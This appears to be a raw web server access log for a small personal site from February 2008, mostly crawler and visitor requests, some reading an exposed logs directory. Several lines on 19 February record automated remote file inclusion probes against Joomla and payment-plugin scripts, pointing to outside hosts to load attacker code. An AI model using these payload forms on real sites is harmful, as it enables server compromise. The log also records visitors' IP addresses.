208.80.193.45 - - [15/Feb/2008:09:55:42 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312469)" "shaneperfect.com"
38.99.13.121 - - [15/Feb/2008:20:07:51 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "shaneperfect.com"
63.123.238.8 - - [15/Feb/2008:22:17:20 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.shaneperfect.com"
63.123.238.8 - - [15/Feb/2008:22:17:20 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/2.0 (compatible; Ask Jeeves/Teoma)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:47:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:47:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:47:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:47:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:47:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:47:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:47:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:47:11 -0800] "GET /robots.txt HTTP/1.1" 404 275 "www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:49:50 -0800] "GET / HTTP/1.1" 200 779 "http://www.pingdom.com/tools/fpt/?url=www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:49:50 -0800] "GET / HTTP/1.1" 200 779 "http://www.pingdom.com/tools/fpt/?url=www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:49:50 -0800] "GET / HTTP/1.1" 200 779 "http://www.pingdom.com/tools/fpt/?url=www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:49:50 -0800] "GET / HTTP/1.1" 200 779 "http://www.pingdom.com/tools/fpt/?url=www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:49:50 -0800] "GET / HTTP/1.1" 200 779 "http://www.pingdom.com/tools/fpt/?url=www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:49:50 -0800] "GET / HTTP/1.1" 200 779 "http://www.pingdom.com/tools/fpt/?url=www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:49:50 -0800] "GET / HTTP/1.1" 200 779 "http://www.pingdom.com/tools/fpt/?url=www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
209.62.82.14 - - [15/Feb/2008:23:49:50 -0800] "GET / HTTP/1.1" 200 779 "http://www.pingdom.com/tools/fpt/?url=www.shaneperfect.com" "Pingdom GIGRIB (http://www.pingdom.com)" "www.shaneperfect.com"
74.6.17.163 - - [16/Feb/2008:08:02:13 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
65.55.213.77 - - [16/Feb/2008:16:35:43 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "shaneperfect.com"
65.55.213.77 - - [16/Feb/2008:16:35:43 -0800] "GET /logs/?D=A HTTP/1.0" 200 3359 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "shaneperfect.com"
74.6.22.216 - - [16/Feb/2008:18:23:31 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.20.217 - - [16/Feb/2008:18:23:32 -0800] "GET /logs/access_070501.log HTTP/1.0" 200 70463 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
65.55.213.77 - - [16/Feb/2008:20:11:35 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "shaneperfect.com"
65.55.213.77 - - [16/Feb/2008:20:11:35 -0800] "GET /logs/access_080101.log HTTP/1.0" 200 1796 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "shaneperfect.com"
65.55.213.77 - - [16/Feb/2008:20:11:35 -0800] "GET /logs/access_071231.log HTTP/1.0" 200 79015 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "shaneperfect.com"
68.142.212.193 - - [17/Feb/2008:06:18:22 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "shaneperfect.com"
78.162.251.113 - - [17/Feb/2008:09:24:39 -0800] "GET /logs/access_070301.log HTTP/1.1" 200 25559 "http://www.google.com.tr/search?hl=tr&q=217.212.224.167&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "shaneperfect.com"
198.22.21.50 - - [17/Feb/2008:12:48:53 -0800] "GET / HTTP/1.1" 200 779 "http://www.google.com/search?hl=en&q=shane+perfect" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "shaneperfect.com"
198.22.21.50 - - [17/Feb/2008:12:48:53 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "shaneperfect.com"
198.22.21.50 - - [17/Feb/2008:12:48:54 -0800] "GET /logs/ HTTP/1.1" 200 3375 "http://shaneperfect.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "shaneperfect.com"
198.22.21.50 - - [17/Feb/2008:12:48:55 -0800] "GET /logs/access_070301.log HTTP/1.1" 200 25559 "http://shaneperfect.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "shaneperfect.com"
198.22.21.50 - - [17/Feb/2008:12:49:05 -0800] "GET / HTTP/1.1" 200 779 "http://www.google.com/search?hl=en&q=shane+perfect" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "shaneperfect.com"
198.22.21.50 - - [17/Feb/2008:12:51:02 -0800] "GET / HTTP/1.1" 200 779 "http://hollyheath.com/fineart.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "shaneperfect.com"
198.22.21.50 - - [17/Feb/2008:12:51:03 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://shaneperfect.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" "shaneperfect.com"
205.178.191.39 - - [17/Feb/2008:12:53:49 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 1.0.3705)" "www.shaneperfect.com"
205.178.191.39 - - [17/Feb/2008:19:47:02 -0800] "GET / HTTP/1.1" 200 779 "-" "Java/1.5.0_11" "www.shaneperfect.com"
74.6.19.114 - - [17/Feb/2008:21:13:46 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.6.27.31 - - [17/Feb/2008:21:13:47 -0800] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.6.19.114 - - [18/Feb/2008:06:16:36 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.6.23.118 - - [18/Feb/2008:06:16:36 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.6.19.153 - - [18/Feb/2008:07:52:18 -0800] "GET /logs/access_071031.log HTTP/1.0" 200 74325 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
66.249.66.80 - - [18/Feb/2008:09:27:25 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "shaneperfect.com"
66.249.66.80 - - [18/Feb/2008:09:27:25 -0800] "GET /logs/ HTTP/1.1" 200 3375 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "shaneperfect.com"
74.6.19.166 - - [18/Feb/2008:11:01:41 -0800] "GET /logs/ HTTP/1.0" 200 3359 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:12:38 -0800] "GET / HTTP/1.1" 200 779 "http://www.google.com/search?hl=en&client=firefox-a&rls=org.mozilla%3Aen-US%3Aofficial&q=%22Shane+Perfect%22+Fort+Wayne&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:12:39 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:12:41 -0800] "GET / HTTP/1.1" 200 779 "http://shaneperfect.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:12:42 -0800] "GET /logs/ HTTP/1.1" 200 3375 "http://shaneperfect.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:12:46 -0800] "GET / HTTP/1.1" 200 779 "http://shaneperfect.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:12:47 -0800] "GET /tmp/ HTTP/1.1" 200 520 "http://shaneperfect.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:12:49 -0800] "GET / HTTP/1.1" 200 779 "http://shaneperfect.com/tmp/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:12:51 -0800] "GET /?N=D HTTP/1.1" 200 779 "http://shaneperfect.com/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
74.140.121.240 - - [18/Feb/2008:11:13:00 -0800] "GET /logs/access_070331.log HTTP/1.1" 200 6009 "http://shaneperfect.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
151.190.254.108 - - [18/Feb/2008:11:29:58 -0800] "GET / HTTP/1.1" 200 779 "http://www.hollyheath.com/fineart.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "shaneperfect.com"
151.190.254.108 - - [18/Feb/2008:11:30:01 -0800] "GET /logs/ HTTP/1.1" 200 3375 "http://shaneperfect.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "shaneperfect.com"
151.190.254.108 - - [18/Feb/2008:11:30:02 -0800] "GET /logs/access.log HTTP/1.1" 200 110554 "http://shaneperfect.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "shaneperfect.com"
151.190.254.108 - - [18/Feb/2008:11:30:05 -0800] "GET / HTTP/1.1" 200 779 "http://www.hollyheath.com/fineart.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.1)" "shaneperfect.com"
86.58.60.197 - - [18/Feb/2008:12:13:42 -0800] "GET /logs/access_071101.log HTTP/1.1" 200 2087 "http://www.google.si/search?hl=sl&q=www.mursia.net&btnG=Iskanje+Google&meta=" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)" "shaneperfect.com"
74.6.19.114 - - [18/Feb/2008:18:51:04 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
72.30.179.203 - - [18/Feb/2008:18:51:04 -0800] "GET /tmp/?N=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
64.12.117.68 - - [18/Feb/2008:19:11:48 -0800] "GET / HTTP/1.1" 200 779 "http://hollyheath.com/fineart.html" "Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.0; Windows NT 5.1; .NET CLR 1.1.4322)" "shaneperfect.com"
74.6.22.216 - - [19/Feb/2008:04:13:20 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.23.206 - - [19/Feb/2008:04:13:20 -0800] "GET /logs/ HTTP/1.0" 200 3359 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.22.216 - - [19/Feb/2008:05:17:09 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.24.48 - - [19/Feb/2008:05:17:09 -0800] "GET /?M=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.19.114 - - [19/Feb/2008:05:23:15 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.6.19.198 - - [19/Feb/2008:05:23:15 -0800] "GET /logs/access_071001.log HTTP/1.0" 200 59526 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.52.245.146 - - [19/Feb/2008:07:25:16 -0800] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.5) Gecko/20041107 Firefox/1.0" "www.shaneperfect.com"
82.80.249.160 - - [19/Feb/2008:10:10:07 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1; .NET CLR 2.0.50727)" "shaneperfect.com"
68.142.212.193 - - [19/Feb/2008:11:19:44 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "shaneperfect.com"
65.214.45.101 - - [19/Feb/2008:11:47:00 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.shaneperfect.com"
65.214.45.101 - - [19/Feb/2008:11:47:00 -0800] "GET /digital.html HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.shaneperfect.com"
38.99.13.121 - - [19/Feb/2008:13:44:29 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuill.com/twiceler/robot.html)" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs/access_071101.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs/access_071101.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs/access_071101.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs/access_071101.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs/access_071101.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs/access_071101.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs/access_071101.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:23 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
85.17.200.74 - - [19/Feb/2008:15:29:24 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.geocities.com/rha.mutzz/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "shaneperfect.com"
66.249.66.80 - - [19/Feb/2008:15:56:21 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "shaneperfect.com"
66.249.66.80 - - [19/Feb/2008:15:56:21 -0800] "GET /logs/access_070501.log HTTP/1.1" 200 70463 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "shaneperfect.com"
209.31.183.74 - - [19/Feb/2008:16:14:30 -0800] "GET ///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://notice.se/homepage/images/sida6_4.gif?????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "shaneperfect.com"
85.13.195.52 - - [19/Feb/2008:18:15:59 -0800] "GET /logs//plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "shaneperfect.com"
85.13.195.52 - - [19/Feb/2008:18:15:59 -0800] "GET //plugins/payment/paymenow/paymenow.inc.php?config[root_dir]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "shaneperfect.com"
66.249.66.80 - - [19/Feb/2008:20:36:32 -0800] "GET /logs/access_070329.log HTTP/1.1" 200 49820 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "shaneperfect.com"
65.55.213.77 - - [19/Feb/2008:21:26:03 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "shaneperfect.com"
65.55.213.77 - - [19/Feb/2008:21:26:03 -0800] "GET / HTTP/1.0" 200 763 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)" "shaneperfect.com"
208.80.193.44 - - [19/Feb/2008:21:55:44 -0800] "GET / HTTP/1.1" 200 779 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312465)" "shaneperfect.com"
212.32.103.79 - - [20/Feb/2008:08:01:05 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.12; .NET CLR 2.0.50727) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
205.178.191.39 - - [20/Feb/2008:10:27:10 -0800] "GET / HTTP/1.1" 200 779 "-" "Java/1.5.0_11" "www.shaneperfect.com"
74.6.22.216 - - [20/Feb/2008:11:40:05 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
72.30.179.207 - - [20/Feb/2008:11:40:05 -0800] "GET /?N=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
64.12.117.68 - - [20/Feb/2008:18:48:21 -0800] "HEAD / HTTP/1.1" 200 0 "-" "-" "shaneperfect.com"
66.249.66.80 - - [20/Feb/2008:23:33:19 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "shaneperfect.com"
66.249.66.80 - - [20/Feb/2008:23:33:19 -0800] "GET /logs/access_070531.log HTTP/1.1" 200 73402 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "shaneperfect.com"
74.6.22.216 - - [20/Feb/2008:23:45:27 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.29.33 - - [20/Feb/2008:23:45:27 -0800] "GET /tmp/ HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.7.148 - - [21/Feb/2008:00:36:12 -0800] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.24.72 - - [21/Feb/2008:02:42:33 -0800] "GET /?S=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.shaneperfect.com"
74.6.19.114 - - [21/Feb/2008:09:46:25 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
74.6.27.49 - - [21/Feb/2008:09:46:25 -0800] "GET /tmp/?D=A HTTP/1.0" 200 504 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "shaneperfect.com"
64.34.145.196 - - [21/Feb/2008:15:33:11 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.shaneperfect.com"
64.34.145.196 - - [21/Feb/2008:15:33:11 -0800] "GET / HTTP/1.0" 200 763 "-" "SBIder/SBIder-0.8.2-dev (http://www.sitesell.com/sbider.html)" "www.shaneperfect.com"
216.249.145.232 - - [21/Feb/2008:15:58:13 -0800] "GET /favicon.ico HTTP/1.1" 404 275 "http://www.google.com/search?q=38.99.203.110&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12" "shaneperfect.com"
68.142.212.193 - - [21/Feb/2008:16:00:35 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)" "shaneperfect.com"
72.36.114.248 - - [21/Feb/2008:16:48:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "NutchCVS (Nutch; http://lucene.apache.org/nutch/bot.html; nutch-agent@lucene.apache.org)" "shaneperfect.com"
